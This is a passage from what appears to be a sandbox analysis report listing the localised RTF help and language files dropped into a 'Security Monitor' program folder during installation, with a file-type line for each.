C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-5T0L3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-622QE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-84AOI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-BL5AI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-DSGC3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-IRN29.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-J0DP4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-KA9DB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-KBOVQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-KOKD1.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-NM0TU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-Q51A2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-U3SV7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\McAfee_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\eset_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-0B3MR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-0L4V9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-0TJQR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-16AP3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-191EB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-34O0U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-5PE62.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-8E5OH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-BA6OJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-EU6TD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-JH3LT.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-LR177.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-NIOLM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-PURT4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-QBNGP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-REUJC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-RS5TB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-TGDH1.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-TH45P.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-TRDP9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-VHHT9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\law_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\norton_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-30VPI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-3NGF2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-4HFAD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-4VNHB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-64G2E.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-84S39.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-AJ2I6.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-D55ON.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-ELOCA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-F1C0A.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-I60JV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-ISN8T.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-J7F78.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-U6894.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-V8QER.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-VEUU5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-VTN2G.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish.lng (copy)
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-0QN1F.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-5C81D.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-5NG0A.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-6GDRB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-6HIEM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-C3L0A.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-E3876.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-FG2VS.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-IMAT0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-JK8CM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-K8S8R.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-LPHVO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-LQH6B.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-MJ2IR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-MOAPH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-MPKJU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-N043V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\sound.rtf (copy)
|
